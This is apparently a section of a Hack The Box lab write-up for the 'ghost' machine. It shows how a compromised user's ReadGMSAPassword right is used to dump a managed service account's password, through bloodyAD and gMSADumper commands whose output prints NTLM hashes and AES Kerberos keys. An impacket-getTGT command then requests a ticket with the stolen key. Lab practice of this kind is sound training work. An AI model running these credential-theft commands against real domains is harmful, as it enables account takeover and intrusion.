ReadGMSAPassword
According to the BloodHound assessment earlier, the justin.bradley user has ReadGMSAPassword privilege over the ADFS_GMSA$ account.
Now that I have compromised the justin.bradley account, I can proceed it
The msds-managedpassword attribute is a special LDAP attribute that contains the gMSA password
I could use any LDAP tool to read it
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=justin.bradley@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb get object adfs_gmsa$ --attr msDS-ManagedPassword
distinguishedName: CN=adfs_gmsa,CN=Managed Service Accounts,DC=ghost,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:4f4b81c5f6a9c1931310ece55a02a8d6
msDS-ManagedPassword.B64ENCODED: 7HruMmhg6DsNY3UFjFEi9+NHoDUqpWhJ6uHXlr46oGDPYD5APHGgEsxy3tTUb8u6ALtheYCe7KoFTDc5RVlBqwLrZ/kkr2+5t1Ga03tLmA5+0rhcsIO5MoegY9VgZ9v/S7zl+Q6gx/w5uYOKDMPb2WzOyfOcoO32y+oSHeCxkq2mj3nDPbZ+KsAi+Vum3QTONYrnJXrNO4GXjnr7dEvwoyJNnVIOzDCsvhzY45vTPV4EiHvLH/usS3tX+fyopcDSilcVAYCNu4JajB5AyQFr4+12W30uxl5eMP6SdVFT+kA1zCfGvL7ZFD8oxaCehHbvN37dt3XqjnSrT7HnvXQYiQ==aad3b435b51404eeaad3b435b51404ee:4f4b81c5f6a9c1931310ece55a02a8d6 for the adfs_gmsa$ account
Kerberos Secrets
Technically, it’s also possible to retrieve Kerberos secrets (AES128 and AES256), which is preferred for OPSEC 3 well-known tools can be used for the operation;
- DSInternals : A PowerShell module
- GMSAPasswordReader: A C# based executable
- gMSADumper: A Python script
Both DSInternals and GMSAPasswordReader requires a valid session to the target system as the reading user, whereas gMSADumper can be used remotely
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=justin.bradley@dc01.ghost.htb.ccache python3 gMSADump.py -d GHOST.HTB -l dc01.ghost.htb -k
Users or groups who can read password for adfs_gmsa$:
> DC01$
> justin.bradley
adfs_gmsa$:::4f4b81c5f6a9c1931310ece55a02a8d6
adfs_gmsa$:aes256-cts-hmac-sha1-96:fe641d9fcb8c2652d7bcaa8ae30c1a532742c634d562466eba7a2e799812f036
adfs_gmsa$:aes128-cts-hmac-sha1-96:a29e31f574541765a26cfde4a3070810Those are the additional Kerberos secrets in both AES128 and AES256 format
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ impacket-getTGT 'GHOST.HTB/adfs_gmsa$@dc01.ghost.htb' -aesKey fe641d9fcb8c2652d7bcaa8ae30c1a532742c634d562466eba7a2e799812f036 -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Saving ticket in adfs_gmsa$@dc01.ghost.htb.ccacheValidated
TGT generated for the adfs_gmsa$ account